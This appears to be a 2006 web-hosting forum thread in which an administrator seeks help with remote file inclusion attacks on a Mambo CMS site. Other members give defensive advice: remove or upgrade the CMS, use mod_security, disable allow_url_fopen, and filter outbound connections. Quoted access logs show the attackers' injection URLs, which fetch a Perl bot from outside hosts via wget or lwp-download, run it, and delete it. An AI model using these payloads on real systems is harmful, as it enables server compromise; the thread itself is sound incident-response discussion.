php script injections

Discussion in 'General' started by Grizzly, Jul 16, 2006.

  1. Grizzly

    Grizzly New Member

    server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

    extract from logfile /var/log/apache2/access_log

    82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

    extract from logfile /var/log/apache2/error_log

    [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
    [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
    --22:20:55-- http://66.90.88.178/mambo.txt
    => `mambo.txt'
    Connecting to 66.90.88.178:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 16,282 (16K) [text/plain]

    0K .......... ..... 100% 7.77 KB/s

    22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

    kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
    [Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
    [Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


    Need help advice anything...

    Thank you in advance
     
  2. sjau

    sjau Local Meanie Moderator

    you could deny the IP of the attacker in a .htaccess
     
  3. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again..

    I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either..

    Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..
     
  4. edge

    edge Active Member Moderator

  5. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    You also checked that eh? :D
     
  6. Grizzly

    Grizzly New Member

    Cant find the scripts on my site

    I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing

    66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge.

    I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.
     
  7. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    The script looks like a war bot or how they are called.. They are using known exploid of script (you running Mambo script right?), they google it and then try to inject this script.

    Check by running processes (ps) and network connections (netstat) if you are connected to IRC
    host: 66.90.88.178
    port: 7474

    If you are, kill it! and block that port and IP with firewall..

    Once you fix this, got to that IRC channel and say to them: I just PWNED YOU! :D
     
  8. Grizzly

    Grizzly New Member

    output of netstat

    Active UNIX domain sockets (w/o servers)
    Proto RefCnt Flags Type State I-Node Path
    unix 14 [ ] DGRAM 9984 /dev/log
    unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log
    unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd
    unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_s ocket2
    unix 2 [ ] DGRAM 28905
    unix 2 [ ] DGRAM 17548
    unix 2 [ ] DGRAM 16934
    unix 3 [ ] STREAM CONNECTED 16687
    unix 3 [ ] STREAM CONNECTED 16686
    unix 3 [ ] STREAM CONNECTED 16683
    unix 3 [ ] STREAM CONNECTED 16682
    unix 3 [ ] STREAM CONNECTED 16679
    unix 3 [ ] STREAM CONNECTED 16678
    unix 3 [ ] STREAM CONNECTED 16675
    unix 3 [ ] STREAM CONNECTED 16674
    unix 3 [ ] STREAM CONNECTED 16671
    unix 3 [ ] STREAM CONNECTED 16670
    unix 3 [ ] STREAM CONNECTED 16667
    unix 3 [ ] STREAM CONNECTED 16666
    unix 3 [ ] STREAM CONNECTED 16663
    unix 3 [ ] STREAM CONNECTED 16662
    unix 3 [ ] STREAM CONNECTED 16659
    unix 3 [ ] STREAM CONNECTED 16658
    unix 3 [ ] STREAM CONNECTED 16655
    unix 3 [ ] STREAM CONNECTED 16654
    unix 3 [ ] STREAM CONNECTED 16651
    unix 3 [ ] STREAM CONNECTED 16650
    unix 3 [ ] STREAM CONNECTED 16647
    unix 3 [ ] STREAM CONNECTED 16646
    unix 3 [ ] STREAM CONNECTED 16643
    unix 3 [ ] STREAM CONNECTED 16642
    unix 3 [ ] STREAM CONNECTED 16639
    unix 3 [ ] STREAM CONNECTED 16638
    unix 3 [ ] STREAM CONNECTED 16635
    unix 3 [ ] STREAM CONNECTED 16634
    unix 3 [ ] STREAM CONNECTED 16631
    unix 3 [ ] STREAM CONNECTED 16630
    unix 3 [ ] STREAM CONNECTED 16627
    unix 3 [ ] STREAM CONNECTED 16626
    unix 3 [ ] STREAM CONNECTED 16623
    unix 3 [ ] STREAM CONNECTED 16622
    unix 3 [ ] STREAM CONNECTED 16619
    unix 3 [ ] STREAM CONNECTED 16618
    unix 3 [ ] STREAM CONNECTED 16615
    unix 3 [ ] STREAM CONNECTED 16614
    unix 3 [ ] STREAM CONNECTED 16611
    unix 3 [ ] STREAM CONNECTED 16610
    unix 3 [ ] STREAM CONNECTED 16607
    unix 3 [ ] STREAM CONNECTED 16606
    unix 3 [ ] STREAM CONNECTED 16603
    unix 3 [ ] STREAM CONNECTED 16602
    unix 3 [ ] STREAM CONNECTED 16599
    unix 3 [ ] STREAM CONNECTED 16598
    unix 3 [ ] STREAM CONNECTED 16595
    unix 3 [ ] STREAM CONNECTED 16594
    unix 3 [ ] STREAM CONNECTED 16591
    unix 3 [ ] STREAM CONNECTED 16590
    unix 3 [ ] STREAM CONNECTED 16588
    unix 3 [ ] STREAM CONNECTED 16587
    unix 3 [ ] STREAM CONNECTED 16584
    unix 3 [ ] STREAM CONNECTED 16583
    unix 3 [ ] STREAM CONNECTED 16581
    unix 3 [ ] STREAM CONNECTED 16580
    unix 2 [ ] DGRAM 16565
    unix 2 [ ] DGRAM 13315
    unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bu s_socket
    unix 3 [ ] STREAM CONNECTED 13229
    unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-q emgvsK3Jl
    unix 3 [ ] STREAM CONNECTED 13018
    unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bu s_socket
    unix 3 [ ] STREAM CONNECTED 12907
    unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket
    unix 3 [ ] STREAM CONNECTED 12905
    unix 2 [ ] DGRAM 12902
    unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket
    unix 3 [ ] STREAM CONNECTED 12504
    unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-q emgvsK3Jl
    unix 3 [ ] STREAM CONNECTED 12503
    unix 2 [ ] DGRAM 12142
    unix 2 [ ] DGRAM 10931
    unix 2 [ ] DGRAM 10743
    unix 2 [ ] DGRAM 10537
    unix 2 [ ] DGRAM 10363
    unix 2 [ ] DGRAM 9994
    unix 2 [ ] STREAM CONNECTED 9811
    unix 3 [ ] STREAM CONNECTED 4968
    unix 3 [ ] STREAM CONNECTED 4967
     
  9. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    Do a netstat -tap
    sorry :)
     
  10. Grizzly

    Grizzly New Member

    netstat -tap reveals the following

    Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
    tcp 0 0 *:mysql *:* LISTEN 3045/mysqld
    tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam
    tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap
    tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http
    tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce
    tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named
    tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named
    tcp 0 0 localhost:domain *:* LISTEN 5276/named
    tcp 0 0 localhost:953 *:* LISTEN 5276/named
    tcp 0 0 *:smtp *:* LISTEN 5138/master
    tcp 0 0 *:pop3 *:* LISTEN 4531/couriertcpd
    tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd
    tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork
    tcp 0 0 *:ssh *:* LISTEN 4905/sshd
    tcp 0 0 localhost:953 *:* LISTEN 5276/named
    tcp 0 0 *:smtp *:* LISTEN 5138/master
    tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork
     
  11. Grizzly

    Grizzly New Member

    This is after I blocked what you said before on the firewall and restarted the server, I have also blocked the ip's in .htaccess
     
  12. Ben

    Ben ISPConfig Developer ISPConfig Developer

    for securing you could use mod_security for apache.
    But be careful with that, so misconfigured mod_security causes e.g. phpMyAdmin to not work anymore, because it submits built queries via GET which is disallowed in some howtos for mod_security.

    Next thing you can do is to disallow stuff like url_fopen wrappers in php.ini, because normally the admin should now if scripts need to get sth. from anywhere in the internet.
     
  13. Grizzly

    Grizzly New Member

    Any idea on where to find good posts on mod_security for suse10
     
  14. Ben

    Ben ISPConfig Developer ISPConfig Developer

    On what? Installation or configuration?

    That's a (undocumented) config example on mod_security
    That can be placed anywhere in you apache config... under debian it makes sense to store that file to mods-available and link it into mods-enabled on usage. Under Suse I actually (and I don't mind :D ) don't know the hundreds of files the config is split into and where to best put that...

    Also you must load the module with sth. like
    Do disable that stuff for e.g. phpMyAdmin
    If you're not willing to apply that rules from above to _ALL_ your sites and to a whitelist like that stuff with phpMyAdmin, it makes sense to apply that filter only on some dirs....

    More on Installation and configuration can be found here: http://www.modsecurity.org/documentation/modsecurity-apache/1.9.3/html-multipage/
     
  15. falko

    falko Super Moderator ISPConfig Developer

  16. Grizzly

    Grizzly New Member

    Attacks continue

    I've now spent the last 48h reinstalling the entire server. I've done all the above mentioned, but when I check my logfiles I find the following in except for the mod_security bit. I've redone the websites the mambo sites are now blank joomla latest stable version sites untill I get time to redo them. The only .htaccess files I can find lie in the stats folders is this correct.
    /var/log/httpd/ispconfig_access_log:

    www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

    and in /var/log/apache2/access_log for the same time

    82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
    61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

    and in /var/log/apache2/error_log at the same time

    [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP

    is this a failed attempt or do I have reason to worry, I'm about to go out of my mind. Please help
     
  17. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    Attacks continue cause you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this mambo site and the attacks will stop. Blocking 1 IP is kinda useless since they just change sites..

    Again, REMOVE THE WEBSITE or update website with newer patch or something.. What version of Mambo cms are you using?
     
  18. todvard

    todvard ISPConfig Developer ISPConfig Developer

    Just one thing to mention, it is a good practice to enable and configure firewall for outbound connections as well. If you had a good firewall script which allow to access http only to trusted sites, then you wouldn't have to worry about those attacks.
     
  19. edge

    edge Active Member Moderator

  20. Ben

    Ben ISPConfig Developer ISPConfig Developer

    and don't forget to allow only some symten users for some connections....


    next thing is disable "allow url fopen" in php.ini to prevent any script reading stuff from anywhere in the internet!
     

Share This Page